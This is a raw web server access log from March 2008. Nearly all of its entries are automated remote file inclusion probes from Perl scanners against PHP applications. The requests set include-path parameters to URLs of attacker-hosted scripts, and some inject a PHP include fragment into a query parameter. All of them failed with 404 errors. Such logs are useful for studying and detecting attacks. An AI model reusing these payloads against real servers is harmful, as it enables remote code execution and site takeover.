211.233.63.186 - - [31/Mar/2008:17:52:10 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
217.11.95.5 - - [31/Mar/2008:17:53:25 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
217.11.95.5 - - [31/Mar/2008:17:53:25 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
74.6.22.91 - - [31/Mar/2008:17:53:33 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
74.6.20.119 - - [31/Mar/2008:17:53:34 -0700] "GET /menus/?D=A HTTP/1.0" 200 810 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
200.180.216.43 - - [31/Mar/2008:17:53:47 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
200.180.216.43 - - [31/Mar/2008:17:53:51 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:53:53 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:53:53 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:53:53 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.180.216.43 - - [31/Mar/2008:17:54:06 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
205.234.213.67 - - [31/Mar/2008:17:54:31 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.213.67 - - [31/Mar/2008:17:54:31 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [31/Mar/2008:17:55:29 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:55:49 -0700] "GET /logs/access.log/index.php?pageurl=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:55:50 -0700] "GET /index.php?pageurl=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:55:50 -0700] "GET /logs/index.php?pageurl=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:17:55:52 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [31/Mar/2008:17:56:11 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:17:56:31 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:56:51 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:56:51 -0700] "GET //skin/zero_vote/error.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:56:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
88.151.103.27 - - [31/Mar/2008:17:58:23 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
61.63.20.133 - - [31/Mar/2008:17:59:02 -0700] "GET /logs/index.php?visualizar=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
61.63.20.133 - - [31/Mar/2008:17:59:03 -0700] "GET /index.php?visualizar=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.151.103.27 - - [31/Mar/2008:17:59:06 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:17:59:14 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:17:59:15 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.11.95.5 - - [31/Mar/2008:18:00:12 -0700] "GET /logs/access_080101.log/newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
70.86.8.66 - - [31/Mar/2008:18:01:22 -0700] "GET /logs/access.log//modules/mod_calendar.php?absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [31/Mar/2008:18:01:22 -0700] "GET //modules/mod_calendar.php?absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [31/Mar/2008:18:01:23 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
81.89.137.99 - - [31/Mar/2008:18:02:17 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
81.89.137.99 - - [31/Mar/2008:18:02:34 -0700] "GET /logs/access_080201.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:18:04:49 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:18:04:49 -0700] "GET //skin/zero_vote/error.php?dir=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:18:04:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
207.54.110.201 - - [31/Mar/2008:18:05:02 -0700] "GET /logs/access.log/newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
207.54.110.201 - - [31/Mar/2008:18:05:02 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
207.54.110.201 - - [31/Mar/2008:18:05:02 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
83.85.57.59 - - [31/Mar/2008:18:05:46 -0700] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
83.85.57.59 - - [31/Mar/2008:18:05:46 -0700] "GET /skin/zero_vote/error.php?dir=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
83.85.57.59 - - [31/Mar/2008:18:05:46 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
74.55.6.34 - - [31/Mar/2008:18:05:54 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.55.6.34 - - [31/Mar/2008:18:05:54 -0700] "GET //skin/zero_vote/error.php?dir=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.55.6.34 - - [31/Mar/2008:18:05:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.213.67 - - [31/Mar/2008:18:06:14 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.213.67 - - [31/Mar/2008:18:06:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.213.67 - - [31/Mar/2008:18:06:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.213.67 - - [31/Mar/2008:18:06:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
207.54.110.201 - - [31/Mar/2008:18:08:06 -0700] "GET /logs/access_080101.log/newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:18:08:54 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:18:08:54 -0700] "GET //modules/My_eGallery/index.php?basepath=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:18:08:54 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:18:09:49 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:18:09:49 -0700] "GET //modules/My_eGallery/index.php?basepath=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:18:09:49 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:12:00 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:12:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:12:17 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.180.216.43 - - [31/Mar/2008:18:18:43 -0700] "GET /logs/access.log/errors.php?errors=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
200.180.216.43 - - [31/Mar/2008:18:18:48 -0700] "GET /errors.php?errors=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
200.180.216.43 - - [31/Mar/2008:18:18:54 -0700] "GET /logs/errors.php?errors=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:20:04 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:20:13 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:20:21 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
66.6.223.240 - - [31/Mar/2008:18:21:34 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.6.223.240 - - [31/Mar/2008:18:21:34 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.6.223.240 - - [31/Mar/2008:18:21:34 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [31/Mar/2008:18:21:37 -0700] "GET /logs/access.log/middle.php?file=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [31/Mar/2008:18:21:37 -0700] "GET /middle.php?file=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [31/Mar/2008:18:21:37 -0700] "GET /logs/middle.php?file=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.58.254.89 - - [31/Mar/2008:18:27:21 -0700] "GET /logs/access.log/middle.php?file=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.58.254.89 - - [31/Mar/2008:18:27:21 -0700] "GET /middle.php?file=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.58.254.89 - - [31/Mar/2008:18:27:22 -0700] "GET /logs/middle.php?file=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:18:27:41 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:18:29:02 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:18:33:02 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:18:33:03 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:18:35:23 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:18:35:24 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
217.67.26.84 - - [31/Mar/2008:18:37:22 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:18:37:25 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.67.26.84 - - [31/Mar/2008:18:38:38 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.14.216.89 - - [31/Mar/2008:18:44:21 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
85.14.216.89 - - [31/Mar/2008:18:44:22 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:18:44:48 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.101.193.183 - - [31/Mar/2008:18:46:08 -0700] "GET /logs/access.log//atom.php5?page=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
72.46.131.186 - - [31/Mar/2008:18:46:24 -0700] "GET /logs/access_071201.log/index.php?body=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.46.131.186 - - [31/Mar/2008:18:46:24 -0700] "GET /index.php?body=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.46.131.186 - - [31/Mar/2008:18:46:24 -0700] "GET /logs/index.php?body=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.46.131.186 - - [31/Mar/2008:18:46:41 -0700] "GET /logs/access_071101.log/index.php?body=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.62.80.134 - - [31/Mar/2008:18:46:52 -0700] "GET /index.php?body=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.bsfadvisors.com"
209.62.80.134 - - [31/Mar/2008:18:46:52 -0700] "GET /logs/index.php?body=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.bsfadvisors.com"
200.101.193.183 - - [31/Mar/2008:18:47:39 -0700] "GET /logs//atom.php5?page=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
72.46.131.186 - - [31/Mar/2008:18:48:03 -0700] "GET /index.php?body=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
59.106.75.43 - - [31/Mar/2008:18:48:55 -0700] "GET /logs/access.log//includes/functions_weblog.php?mx_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
59.106.75.43 - - [31/Mar/2008:18:48:56 -0700] "GET //includes/functions_weblog.php?mx_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
59.106.75.43 - - [31/Mar/2008:18:48:56 -0700] "GET /logs//includes/functions_weblog.php?mx_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:49:21 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:49:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:49:40 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:50:20 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
83.226.209.39 - - [31/Mar/2008:18:50:24 -0700] "GET /logs/access.log//includes/functions_weblog.php?mx_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
83.226.209.39 - - [31/Mar/2008:18:50:25 -0700] "GET //includes/functions_weblog.php?mx_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
83.226.209.39 - - [31/Mar/2008:18:50:25 -0700] "GET /logs//includes/functions_weblog.php?mx_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:50:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:50:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:18:52:45 -0700] "GET /logs/access.log//OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
